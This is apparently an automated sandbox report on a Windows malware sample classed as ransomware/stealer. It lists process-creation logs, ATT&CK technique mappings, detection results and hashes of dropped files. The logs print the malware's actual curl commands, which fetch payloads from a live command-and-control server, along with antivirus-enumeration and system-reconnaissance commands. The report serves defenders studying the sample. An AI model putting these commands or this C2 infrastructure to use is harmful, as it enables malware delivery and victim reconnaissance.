Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zipJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayNameJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /C:"OS Name"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029B9000.00000004.00000020.00020000.00000000.sdmp, Ur.pif, 0000000A.00000000.1743125361.00000000006C6000.00000002.00000001.01000000.00000006.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,50_2_0041713F
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,50_2_00416AF5
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,50_2_0041BC50
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: EnumSystemLocalesA,50_2_00417068
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: EnumSystemLocalesA,50_2_00416CCA
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,50_2_00411CF0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,50_2_0041709F
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,50_2_00411CB0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,50_2_00416D51
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoW,WideCharToMultiByte,50_2_0041BD13
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,50_2_004171C4
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,50_2_0041725C
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: EnumSystemLocalesA,50_2_00416F55
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,50_2_0041BB3D
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,MultiByteToWideChar,50_2_0041BBFA
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: GetLocaleInfoA,50_2_00416FAB
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_00413F9E GetLocalTime,GetSystemTime,GetTimeZoneInformation,50_2_00413F9E
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_004194BD GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,50_2_004194BD
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information1
Scripting
Valid Accounts241
Windows Management Instrumentation
1
Scripting
1
Access Token Manipulation
111
Masquerading
11
Input Capture
2
System Time Discovery
Remote Services11
Input Capture
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
12
Process Injection
13
Virtualization/Sandbox Evasion
LSASS Memory241
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
1
Access Token Manipulation
Security Account Manager13
Virtualization/Sandbox Evasion
SMB/Windows Admin Shares1
Clipboard Data
3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Process Injection
NTDS3
Process Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information
LSA Secrets3
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
Obfuscated Files or Information
Cached Domain Credentials46
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Software Packing
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
[Behavior graph: ID 1560430; Sample: vqMMwqCFZQ; Startdate: 21/11/2024; Architecture: WINDOWS; Score: 100]

Source | Detection | Scanner | Label
vqMMwqCFZQ.exe | 67% | ReversingLabs | Win32.Trojan.Generic

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\139918\Ur.pif | 5% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\303482\Either.pif | 5% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\RevenueDevices.exe | 58% | ReversingLabs | Win32.Trojan.Ramses
C:\Users\user\AppData\Roaming\DolphinDumps\7za.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\DolphinDumps\7za.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\DolphinDumps\7zxa.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo64.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exe | 5% | ReversingLabs |
C:\Users\user\AppData\Roaming\DolphinDumps\zip.exe | 0% | ReversingLabs |
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mCpLognXwrhUlFWj.mCpLognXwrhUlFWj | unknown | unknown | false | | unknown
    NameMaliciousAntivirus DetectionReputation
    NameSourceMaliciousAntivirus DetectionReputation
IP | Domain | Country | ASN | ASN Name | Malicious
178.215.224.252 | unknown | Germany | 10753 | LVLT-10753US | false
178.215.224.74 | unknown | Germany | 10753 | LVLT-10753US | true
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1560430
                Start date and time:2024-11-21 19:57:44 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 11m 23s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:227
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:vqMMwqCFZQ.exe
                (renamed file extension from none to exe, renamed because original name is a hash value)
                Original Sample Name:5b14c48842c63552a468d3da9500bb34f3bbd1cd16decbc17a22ff0f2aada887
                Detection:MAL
                Classification:mal100.rans.spre.evad.winEXE@298/62@1/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 91
                • Number of non-executed functions: 115
                Cookbook Comments:
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, GyxNFpxuLvDE.GyxNFpxuLvDE, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtEnumerateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: vqMMwqCFZQ.exe
Time | Type | Description
13:58:44 | API Interceptor | 2795x Sleep call for process: Ur.pif modified
13:59:36 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
18:58:29 | Task Scheduler | Run new task: {0E00B38F-D917-49A0-A531-F43CB9A2DE95} path:
Match | Associated Sample Name / URL | Detection | Threat Name | Context
178.215.224.252 | 044f.pdf.exe | malicious | Unknown | 178.215.224.252/v10/ukyh.php?jspo=6
178.215.224.252 | stealer.exe | malicious | Unknown | 178.215.224.252/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D
178.215.224.252 | stealer.exe | malicious | Unknown | 178.215.224.252/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D
178.215.224.74 | 044f.pdf.exe | malicious | Unknown | 178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9A7060554A2A0FC233A18A84321FDA&zjyp=true&yuvc=false&nzrj=00000&sftb=true
                No context
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                LVLT-10753US | i486.elf | Get hash | malicious | Mirai | Browse | 168.215.128.210
                 | JGWfssorui.dll | Get hash | malicious | DanaBot | Browse | 193.56.146.53
                 | ElTZP4yjRG.dll | Get hash | malicious | DanaBot | Browse | 193.56.146.53
                 | H6PtrbXJ9Q.dll | Get hash | malicious | DanaBot | Browse | 193.56.146.53
                 | Mj1o4aZG6y.dll | Get hash | malicious | DanaBot | Browse | 193.56.146.53
                 | OYGqoSlvmi.dll | Get hash | malicious | DanaBot | Browse | 193.56.146.53
                 | 5vcrbMCVE7.dll | Get hash | malicious | DanaBot | Browse | 193.56.146.53
                 | OD195KrzCl.dll | Get hash | malicious | DanaBot | Browse | 193.56.146.53
                 | VKxD9FFAj0.dll | Get hash | malicious | DanaBot | Browse | 193.56.146.53
                 | http://178.215.224.252/v10/ukyh.php | Get hash | malicious | Unknown | Browse | 178.215.224.252
                No context
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                C:\Users\user\AppData\Local\Temp\139918\Ur.pif | fT0L8msd6q.exe | Get hash | malicious | Unknown | Browse |
                 | fT0L8msd6q.exe | Get hash | malicious | Unknown | Browse |
                 | qaHUaPUib8.exe | Get hash | malicious | Unknown | Browse |
                 | qaHUaPUib8.exe | Get hash | malicious | Unknown | Browse |
                 | eddzD2MA12.exe | Get hash | malicious | Stealc, Vidar | Browse |
                 | file.exe | Get hash | malicious | PureLog Stealer, XWorm | Browse |
                 | file.exe | Get hash | malicious | XWorm | Browse |
                 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Zhark RAT | Browse |
                 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar | Browse |
                 | ohDGVKFUNe.exe | Get hash | malicious | Unknown | Browse |
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:modified
                                    Size (bytes):893608
                                    Entropy (8bit):6.62028134425878
                                    Encrypted:false
                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 5%
                                    Joe Sandbox View:
                                    • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                    • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                    • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                    • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                    • Filename: eddzD2MA12.exe, Detection: malicious, Browse
                                    • Filename: file.exe, Detection: malicious, Browse
                                    • Filename: file.exe, Detection: malicious, Browse
                                    • Filename: file.exe, Detection: malicious, Browse
                                    • Filename: file.exe, Detection: malicious, Browse
                                    • Filename: ohDGVKFUNe.exe, Detection: malicious, Browse
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):543384
                                    Entropy (8bit):7.999617603706052
                                    Encrypted:true
                                    SSDEEP:12288:9jAwmA/cECfkYWM8Dh+VVq+TAPPk3Tq5b7O0SS+XNNZEU7z3myUp:Z7mAN+T/a+oPMTM7Pz+9NZw
                                    MD5:C38D8D99A80F7693FF8676A998203028
                                    SHA1:9147B3DBF8FFD56E83D3B75C775326A7DEB36F55
                                    SHA-256:CD7599C946D34EEE5A3F58D8C2B4E8D2DF10B2F6FD647EFE309EB33A052BC714
                                    SHA-512:F2C121C81CDB9BB9ABD1C60C4137286736C8DF59AF51BE3CCB5F8F2E2BD375B819307E8FC38B7166ED5F878525F181DCDC92917FC1BA12FCD0B7CACDA174F524
                                    Malicious:true
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):40
                                    Entropy (8bit):3.8725738836114343
                                    Encrypted:false
                                    SSDEEP:3:3JEaWNFWDiA7VFov:3JEXWDiA7VFov
                                    MD5:E8C8355C0C045BB2F880552A8CDF802C
                                    SHA1:60BD687E45F6AD3D3B41CB84FFC1AF8768F48AC9
                                    SHA-256:E38898BD136D34BA374A074BE6D95E3892772C40D3F13071991BA2344BC667B5
                                    SHA-512:EF413359C3F4341253AD37456DE1E77CE02292DC7AED1F2ECC62DC59D9C122B6376AD1CF4A9BBD0F2C374DB1EADECA3D27F16F582D9E42C61607891C20E61E05
                                    Malicious:false
                                    Preview:displayName ..Windows Defender ..
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):943784
                                    Entropy (8bit):6.625461630496363
                                    Encrypted:false
                                    SSDEEP:24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
                                    MD5:78BA0653A340BAC5FF152B21A83626CC
                                    SHA1:B12DA9CB5D024555405040E65AD89D16AE749502
                                    SHA-256:05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
                                    SHA-512:EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 5%
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):82
                                    Entropy (8bit):3.054487465026234
                                    Encrypted:false
                                    SSDEEP:3:QBWlhjltP4rlnl+SliFlhakDBuFovn:QAjjHwrn+SkUkDkSvn
                                    MD5:7E057A66D876982B5B7E73CB8B59E0DA
                                    SHA1:476CB1CD6ECF19FCB707054562CD4A4D5BEC414A
                                    SHA-256:DBD0C7EEC70B9A99C0D9B50C785A3CEAC3DCE684E3681EBCAE86A4556E8409E1
                                    SHA-512:B8A249A1950AB014D04BE0CED4E4099EAA4C1BBCD961E3EE0806D9698301E6CF04E086C8B969F6C0563FAF6562D31A323DA47A79AC2FD51465903740B53D7ACF
                                    Malicious:false
                                    Preview:..d.i.s.p.l.a.y.N.a.m.e. . . . . . . .....W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. . .....
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):74752
                                    Entropy (8bit):7.997497067030351
                                    Encrypted:true
                                    SSDEEP:1536:y79ilBAGSNbaPp8QuI9A2zPTMl2EbF0fHaDcJzYiSyYYgV:69QBj7PesAwPefSHaDc6Ym
                                    MD5:91B63C1CAE0F192DD39409204B76F14F
                                    SHA1:427827533BD0ED51CBAE4E0E3B038E6B1F8CB23B
                                    SHA-256:0830372D949AFCC6E4D39BC90B5703720BE37AE34BA06DCDDF54E19CBFC86A4A
                                    SHA-512:B0032C61CB62A0BF71D43430964427F5451517EEF569C26FAADA92373C9E1B7EF98094E6E9E1184707B17A7BEF10F383261BD2E08A63915EB9CD3E843755D6EE
                                    Malicious:true
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):83968
                                    Entropy (8bit):7.99784242676174
                                    Encrypted:true
                                    SSDEEP:1536:PzVgzZ8bQPhehNmUuzMKtJE/qjFJwtFO3xzJ7WtKi2cnJqczvwvfUM2XOj09NkK:PJg7ehNmXntgKFJwtFO3z4KfcnEczvNB
                                    MD5:C5C9551F30A44AAB6152B932F7149053
                                    SHA1:C5B31ED9091D873883A9BA4A1D19A1C8C50020F8
                                    SHA-256:ECC645D9AD7E7C4AD052E519F44D314CA15CE749FAFD2BE4384121704E1B26FD
                                    SHA-512:83DD79769DD3F0D0625742AF94309FD5DED51615F9278CEBB558E03777E5346BAF08D3D6AA3C6C84DF41A3E321BEC83FAD828C218E85F3E1D88276DF17797E98
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):95232
                                    Entropy (8bit):7.99828269179223
                                    Encrypted:true
                                    SSDEEP:1536:0i37FzuLlWXtB3XRd9OYyKRMmS2E0e/ASnS+VIQcoGUByCjQnrQ1nVC20D/PMsds:0i37FbRXRd9OyRXE0e/ASS+VIXoGUByA
                                    MD5:1093C62DDE98CA0AA4B349782BB4754A
                                    SHA1:224C060CDCFFEC1704B546B30F809C7436C22A77
                                    SHA-256:9CE8FC5CCCE9C1E1583B83E8096E259BC3BDB9E968535A93367199A2B5E667A4
                                    SHA-512:90D034662444836857E858B06DFB6760869B448AC9327E270095C4BF6688695AD2F2F94367E580EF09A497BDBB140EFD34FCC442D16FC4A510035DF9B42A8D40
                                    Malicious:true
                                    Process:C:\Users\user\Desktop\vqMMwqCFZQ.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):74752
                                    Entropy (8bit):7.997056709124233
                                    Encrypted:true
                                    SSDEEP:1536:MYE75r5qsUBZvfbk57uYxccDzpoiAMEFVTPYOw:gz8ZCPPkFVTY7
                                    MD5:F680B71A7E50BC5F4D947FE5F13D87AC
                                    SHA1:3220576AF77B5C996A46CE521E9F76F62959FCB1
                                    SHA-256:57B03B58A4B83D254447D35154B005336BC097D1EFC4F62075BF32236C098176
                                    SHA-512:EACFF158C63F85D33235DC8537720B46976EE556E94316F7B4486E88BFEF66C02C68450EC0405EAAC8E37A534207161ACE06642A6453580D79E235DD9EA46E95
                                    Malicious:true
                                    Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):68608
                                    Entropy (8bit):7.997498339758161
                                    Encrypted:true
                                    SSDEEP:1536:AypewPLnlLj8Gd5KdggE+wOg+Cs30qsLkGA9FsJ:3tPLlLjb5yghOg+CUEYGAY
                                    MD5:FCC2E848DA8D0BEAC27BA027AE23DC2A
                                    SHA1:D4FAE227CC35C806B7E06D85581FE7540EC4A9CA
